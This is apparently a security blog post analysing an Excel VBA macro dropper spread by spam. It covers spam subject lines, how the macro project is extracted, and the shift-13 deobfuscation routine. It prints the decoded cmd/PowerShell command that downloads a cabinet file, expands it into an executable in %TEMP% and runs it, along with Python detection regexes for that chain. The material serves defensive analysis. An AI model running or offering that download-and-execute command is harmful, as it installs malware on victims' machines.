New Dropper Variety — Lots of Variants Today

We’ve been hit by a lot of variants of a new dropper today, but so far they’ve only been connecting out to two addresses.

You’re going to want to be blocking:


These are packaged up in Excel VBA droppers, delivered as spam mail with subject lines like

Request Documentation [<RANDOM CHARACTERS>]
Claims Documentation [<RANDOM CHARACTERS>]
Invoice Delivery Failure [<RANDOM CHARACTERS>]

From addresses like:

From: Leonard []
From: Peterson <> 
From: Mitchell, Wed, 18 Feb 2015 12:21:43 +0200 [] 
From: Calderon []
Shepherd <>

NB: it’s very unlikely that the legitimate owners of any of these domains are involved in the attack.

The obfuscation technique is new — Office Malware Scanner can’t read the files with its default “info” scan, so you need to use the “inflate” option instead.

This extracts the document’s contents into your Temp folder. Among them is a file called vbaProject.bin inside a folder called xl; that is the macro project.

Then run the info scan in Office Malware Scanner against that file, and it will extract around 23 modules and classes.
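The “inflate” step is just unzipping: an .xlsm is an OOXML zip container and the macro project sits at xl/vbaProject.bin, which is itself an OLE compound file. The following Python is an added example (not the post’s own code and not part of Office Malware Scanner) that builds a constructed, macro-carrying sample archive in memory, pulls out that entry and checks the OLE magic bytes before anything tries to parse it as a VBA project. The placeholder payload is not a real macro project.

```python
import io
import zipfile
from typing import Optional

# Magic bytes at the start of every OLE compound file (vbaProject.bin is one).
OLE_MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"


def build_sample_workbook(with_vba: bool = True) -> bytes:
    """Constructed sample: a minimal OOXML-style archive. The vbaProject.bin
    entry is only the OLE header followed by padding, not a real macro project."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("xl/workbook.xml", "<workbook/>")
        if with_vba:
            zf.writestr("xl/vbaProject.bin", OLE_MAGIC + b"\x00" * 64)
    return buf.getvalue()


def inflate_vba_project(document: bytes) -> Optional[bytes]:
    """Mimic the 'inflate' step: open the document as a zip and return the bytes
    of xl/vbaProject.bin, or None if the file is not a zip or carries no macro
    project. The path is matched case-insensitively to be tolerant of oddly
    built documents."""
    stream = io.BytesIO(document)
    if not zipfile.is_zipfile(stream):
        return None
    stream.seek(0)
    with zipfile.ZipFile(stream) as zf:
        for name in zf.namelist():
            if name.lower() == "xl/vbaproject.bin":
                return zf.read(name)
    return None


def is_ole_container(blob: bytes) -> bool:
    """True if the extracted entry starts with the OLE compound file signature,
    i.e. it is something a VBA-project parser should be pointed at."""
    return blob.startswith(OLE_MAGIC)


if __name__ == "__main__":
    project = inflate_vba_project(build_sample_workbook())
    print("vbaProject.bin found:", project is not None)
    print("looks like an OLE file:", project is not None and is_ole_container(project))
```

On a real sample you would read the .xlsm from disk instead of calling build_sample_workbook(); a document without the xl/vbaProject.bin entry has no VBA project at all, which is a quick way to triage a mailbox full of attachments before reaching for the module extractor.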

The code flow for all variants I’ve seen so far is:

+- Module11.tyrtyaag
   +- Module14.NewQkeTzIIHM

It’s scarcely worth the effort of understanding how these things deobfuscate their values anymore, but this one just looks like it hides them with ROT13!

The obfuscated values are passed in the function call in Module11.

The values are:


The cleaned up deobfuscation code from Module14 looks like this:

' Decodes an obfuscated string by subtracting 13 from every character code.
' Note this is a fixed shift across the whole character set, not a wrapping
' letters-only ROT13, so digits and punctuation are shifted too.
Public Function NewQkeTzIIHM(ByVal AESdyLylMjhJrIu As String) As String
    Dim YyJDVSqLkdZk As Long
    For YyJDVSqLkdZk = 1 To Len(AESdyLylMjhJrIu)
        NewQkeTzIIHM = NewQkeTzIIHM & Chr(Asc(Mid(AESdyLylMjhJrIu, YyJDVSqLkdZk, 1)) - 13)
    Next YyJDVSqLkdZk
    Stop 'my addition: break here so the decoded value can be inspected in the debugger
    Debug.Print NewQkeTzIIHM 'my addition: echo the decoded value to the Immediate window
End Function

The values actually deobfuscate to a cmd call to PowerShell:

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('hxxp://','%TEMP%\'); expand %TEMP%\ %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

I’m no PowerShell expert, but this looks like it pulls down a file from the URI, saves it in the TEMP folder as a cabinet (.cab) file, expands that into an executable, and then runs it.
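To decode these values offline rather than stepping through the macro, and to turn the resulting command line into something a detection rule can match on, here is an added Python example (not the post’s own code). It reimplements Module14’s subtract-13 routine, builds a constructed obfuscated sample with the inverse shift (the hostname and cabinet file name are placeholders; JIOiodfhioIH.exe is the name from the post), and then flags the download / expand / start chain in the decoded command. The indicator names and regexes are my own, not from any vendor signature.

```python
import re
from typing import List, Tuple


def decode_shift13(s: str) -> str:
    """Reimplementation of Module14.NewQkeTzIIHM: subtract 13 from each
    character code. Unlike true ROT13 it does not wrap within the alphabet,
    so 'a' (97) becomes 'T' (84) rather than 'n'."""
    return "".join(chr(ord(c) - 13) for c in s)


def encode_shift13(s: str) -> str:
    """Inverse shift, used here only to construct sample input."""
    return "".join(chr(ord(c) + 13) for c in s)


# Constructed sample plaintext modelled on the decoded command in the post.
# example.invalid and payload.cab are placeholders for the elided values.
SAMPLE_PLAINTEXT = (
    "cmd /K PowerShell.exe (New-Object System.Net.WebClient)"
    ".DownloadFile('hxxp://example.invalid/payload.cab','%TEMP%\\payload.cab'); "
    "expand %TEMP%\\payload.cab %TEMP%\\JIOiodfhioIH.exe; "
    "start %TEMP%\\JIOiodfhioIH.exe;"
)
SAMPLE_OBFUSCATED = encode_shift13(SAMPLE_PLAINTEXT)

# Each indicator covers one stage of the chain the post describes:
# fetch via WebClient, expand the cabinet in %TEMP%, launch the result.
INDICATORS: List[Tuple[str, re.Pattern]] = [
    ("webclient_download",
     re.compile(r"New-Object\s+System\.Net\.WebClient.*DownloadFile", re.I)),
    ("expand_in_temp",
     re.compile(r"\bexpand\s+%TEMP%\\", re.I)),
    ("start_from_temp",
     re.compile(r"\bstart\s+%TEMP%\\\S+\.exe", re.I)),
]


def classify_command(cmd: str) -> List[str]:
    """Return the names of every indicator that matches the command line,
    in the order they are defined. All three together is the full chain."""
    return [name for name, rx in INDICATORS if rx.search(cmd)]


def deobfuscate_and_classify(obfuscated: str) -> Tuple[str, List[str]]:
    """Decode a Module11 argument and report which stages of the chain it hits."""
    decoded = decode_shift13(obfuscated)
    return decoded, classify_command(decoded)


if __name__ == "__main__":
    decoded, hits = deobfuscate_and_classify(SAMPLE_OBFUSCATED)
    print(decoded)
    print("indicators:", hits)
```

To use this on a real sample, paste the string literal that Module11 passes into NewQkeTzIIHM in place of SAMPLE_OBFUSCATED. The classify_command function works equally well on process-creation command lines from endpoint telemetry, where the same three stages show up once the macro has run.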

edit: Conrad Longmore has more here.
